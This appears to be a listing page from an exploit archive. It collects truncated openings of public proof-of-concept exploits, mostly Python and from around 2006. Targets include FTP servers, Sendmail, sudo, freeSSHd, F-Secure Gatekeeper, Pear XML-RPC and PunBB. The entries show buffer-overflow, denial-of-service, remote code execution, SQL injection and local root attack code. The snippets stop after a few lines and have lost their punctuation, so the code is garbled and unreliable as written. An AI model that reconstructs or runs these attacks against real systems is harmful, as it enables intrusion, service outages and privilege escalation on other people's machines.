Hewlett-Packard FTP Print Server <= 2.4.5 Buffer Overflow (PoC)

No description provided by source. !/usr/bin/python import sys from ftplib import FTP print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow POC" print "Copyright c Joxean Koret" print if lensys.argv == 1: print "Usage: %s target" % sys.argv0 sys.exit0 target = sys.argv1 print "+...

MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)

Exploit for unknown platform in category dos / poc ================================================================= MS Windows DNS Resolution Remote Denial of Service PoC MS06-041 ================================================================= !/usr/bin/python POC for MS06-041 Run the python...

Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)

!/usr/bin/python POC for MS06-041 Run the python script passing the local ip address as parameter. The DNS server will start listening on this ip address for DNS hostname resolution queries. This script is for testing and educational purpose and so to test this one will have to point the DNS...

F-Prot Antivirus 4.6.6 (ACE) Denial of Service Exploit

No description provided by source. fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS Copyright c 2006 Evgeny Legerov Permission to use, copy, modify, and distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and...

WarFTPd 1.82.00-RC11 Remote Denial of Service Exploit

No description provided by source. !/usr/bin/env python import sys import ftplib print "WARFTPD Remote Denial Of Service DOS" print "Copyright c Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP print "+ Connecting to target " msg = ftp.connecttarget, targetPort...

WFTPD Pro Server 3.23.1.1 - APPE Remote Buffer Overflow (PoC)

WFTPD Pro Server 3.23.1.1 - APPE Remote Buffer Overflow PoC !/usr/bin/env python import sys import struct import ftplib print "WFTPD Pro Server 3.23.1.1 Buffer Overflow Only a DOS currently, simple POC" print "Copyright c Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp =...

Easy File Sharing FTP Server 2.0 - 'PASS' Remote

!/usr/bin/python Easy File Sharing FTP Server 2.0 PASS 0day PoC exploit Proof of Concept: execute calc.exe Bug found by h07 Tested on XP SP2 polish Date: 28.07.2006 BUFFPASS + 0x20+0x2c+NOP 2571+0x41414141+\r\n EIP = 0x41414141 host = "127.0.0.1" port = 21 lenrecv = 1024 username = "anonymous"...

Sendmail 8.13.5 - Remote Signal Handling (PoC)

Sendmail 8.13.5 - Remote Signal Handling PoC !/usr/bin/env python [email protected] Sendmail 8.13.5 and below Remote Signal Handling exploit usage: rbl4ck-sendmail.py 127.0.0.1 0 25 this exploit was leaked to the PHC Phrack High Council so instead of only letting them have a copy, we figu...

rocksumountdirty.txt

!/usr/bin/env python rocksumountdirty.py: Rocks release =4.1 local root exploit quick and nasty version of the exploit. make sure the . is writable and you clean up afterwards. ; coded by: [email protected] http://xavsec.blogspot.com x=import'os';c=x.getcwd open'%s/x'%c, 'a'.write"!/bin/sh\ncp...

Back-end0721.txt

/ Federico Fazzi, / Back-end = 0.7.2.1 jpcache.php Remote command execution / 08/06/2006 1:04 Bug: jpcache.php: line 40 --- $includedir = $PSL'classdir' . "/jpcache"; --- Proof of concept: Back-end have a default path pre-set on jpcache.php, and cracker can execute a remote command...

freesshd-exploit.txt

!/usr/bin/env python """ Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0 ahmadtauqeeratyahoo.com Disclaimer: This Proof of concept exploit is for educational purpose only. Please do not use it against any system without prior permission. You are responsible for yourself for what you do with this cod...

Code injection

sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158...

CVE-2006-0151

sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158...

Sudo 1.6.x - Environment Variable Handling Security Bypass (2)

Sudo 1.6.x - Environment Variable Handling Security Bypass 2 source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A...

Sudo 1.6.x - Environment Variable Handling Security Bypass (2)

source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A local attacker with the ability to run Python scripts can...

F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation

!/usr/bin/env python F-Secure Anti-Virus Internet Gatekeeper for Linux " lastedit = "Thu Sep 22 23:18:39 EDT 2005" usage = """usage: %s -options options: --version show program's version number and exit. -h, --help show this help message and exit...

xmlrpc.py.txt

!/usr/bin/python ./xmlrpc.py chk|xpl host uri example check bug: ./xmlrpc.py chk www.postnuke.com /xmlrpc.php example exploit bug: ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working for me so i made this python code...

PunBB 1.2.4 (change_email) SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================ PunBB 1.2.4 changeemail SQL Injection Exploit ================================================ !/usr/bin/python | || | | | | | | | || || \ | |/ || '|/ |/ -| ' \ / -/ |||| /| || / ||||,|||...

Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit

Exploit for unknown platform in category dos / poc ================================================== Foxmail 2.0 MAIL FROM: Denial of Service Exploit ================================================== !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def...

Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit

No description provided by source. !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def usage: print "Usage: foxserver.py -h host -p port" sys.exit0 if name == 'main': try: opts, args = getopt.getoptsys.argv1:, "h:p:" except getopt.GetoptError, msg: print m...